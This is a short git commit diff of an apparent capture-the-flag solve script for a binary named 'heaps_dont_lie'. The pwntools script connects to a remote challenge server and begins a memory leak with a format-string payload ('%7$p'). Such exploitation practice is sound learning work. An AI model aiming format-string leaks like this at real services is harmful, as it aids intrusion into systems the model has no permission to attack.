solve script

This commit is contained in:
jc
2024-11-18 19:56:53 +03:00
parent 031201a421
commit d0c429824f
-2
View File
@@ -1,7 +1,6 @@
#!/usr/bin/python3
from pwn import *
import time
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
# r = process()
@@ -9,7 +8,6 @@ r = remote("94.72.112.248", 1244)
# funcs
s = lambda a: r.sendline(a)
ss = lambda a: r.send(a)
# leak
buf = b"%7$p"